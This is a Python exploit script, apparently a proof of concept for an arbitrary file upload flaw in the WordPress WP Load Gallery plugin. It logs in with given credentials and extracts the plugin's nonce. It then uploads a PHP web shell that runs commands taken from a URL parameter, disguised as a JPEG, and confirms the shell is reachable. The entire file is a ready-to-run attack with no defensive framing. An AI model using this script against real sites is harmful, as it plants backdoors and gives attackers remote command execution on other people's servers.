import requests
import re
import argparse

# by Nxploit | Khaled_alenazi

banner = r"""
   _______      ________    ___   ___ ___  _____     ___  ____   ___  _  _ ___  
  / ____\ \    / /  ____|  |__ \ / _ \__ \| ____|   |__ \|___ \ / _ \| || |__ \ 
 | |     \ \  / /| |__ ______ ) | | | | ) | |__ ______ ) | __) | (_) | || |_ ) |
 | |      \ \/ / |  __|______/ /| | | |/ /|___ \______/ / |__ < \__, |__   _/ / 
 | |____   \  /  | |____    / /_| |_| / /_ ___) |    / /_ ___) |  / /   | |/ /_ 
  \_____|   \/   |______|  |____|\___/____|____/    |____|____/  /_/    |_|____|
                                                                                 
"""
print(banner)

requests.packages.urllib3.disable_warnings()
session = requests.Session()
session.verify = False

parser = argparse.ArgumentParser(description="Exploit WP Load Gallery - Arbitrary File Upload")
parser.add_argument("-u", "--url", help="Target WordPress URL (e.g., https://example.com)", required=True)
parser.add_argument("-un", "--username", help="WordPress Username", required=True)
parser.add_argument("-p", "--password", help="WordPress Password", required=True)
args = parser.parse_args()

url = args.url.rstrip('/')
login_url = f"{url}/wp-login.php"
gallery_url = f"{url}/wp-admin/admin.php?page=wp-load-gallery"
ajax_url = f"{url}/wp-admin/admin-ajax.php"
shell_filename = "nxploit.php"
shell_path = f"{url}/wp-content/uploads/2025/02/{shell_filename}"
shell_content = "<?php if(isset($_GET['cmd'])) { system($_GET['cmd']); } ?>"
user_agent = "Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0"

version_url = f"{url}/wp-content/plugins/wp-load-gallery/readme.txt"
print("[+] Checking plugin version...")
version_response = session.get(version_url, headers={"User-Agent": user_agent})

if version_response.status_code == 200:
    version_match = re.search(r'Stable tag:\s*(\d+\.\d+\.\d+)', version_response.text)
    if version_match:
        version = version_match.group(1)
        print(f"[+] Detected version: {version}")
        if version <= "2.1.6":
            print("[+] The target is vulnerable! Proceeding with exploitation...")
        else:
            print("[!] The target is not vulnerable. Exiting.")
            exit()
    else:
        print("[!] Could not determine plugin version. Proceeding with caution.")
else:
    print("[!] Failed to fetch plugin version. Proceeding with caution.")

login_data = {
    "log": args.username,
    "pwd": args.password,
    "rememberme": "forever",
    "wp-submit": "Log+In"
}
response = session.post(login_url, verify=False, data=login_data, headers={"User-Agent": user_agent})

if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
    print("[+] Logged in successfully.")
else:
    print("[!] Failed to log in.")
    exit()

print("[+] Extracting wplg_nonce...")

response = session.get(gallery_url, headers={"User-Agent": user_agent})
wplg_nonce_match = re.search(r'"wplg_nonce"\s*value="(\w+)"', response.text)
if not wplg_nonce_match:
    print("[!] Failed to extract wplg_nonce.")
    exit()
wplg_nonce = wplg_nonce_match.group(1)
print(f"[+] Extracted wplg_nonce: {wplg_nonce}")

files = {
    "wplg_gallery_file[]": (shell_filename, shell_content, "image/jpeg")
}
data = {
    "wplg_nonce": wplg_nonce,
    "action": "wpgallery",
    "wplg_gallery_id": "205",
    "task": "wplg_upload"
}

print("[+] Uploading shell...")
response = session.post(ajax_url, files=files, data=data, headers={"User-Agent": user_agent})

if response.status_code == 200 and "status" in response.text:
    print("[+] File uploaded successfully!")
    print(f"[+] Checking shell at: {shell_path}")
    
    shell_check = session.get(shell_path, headers={"User-Agent": user_agent})
    if shell_check.status_code == 200:
        print(f"[+] Shell is accessible at: {shell_path}?cmd=id")
    else:
        print("[!] Shell upload may have failed, check manually.")
else:
    print("[!] Upload failed, check the response manually.")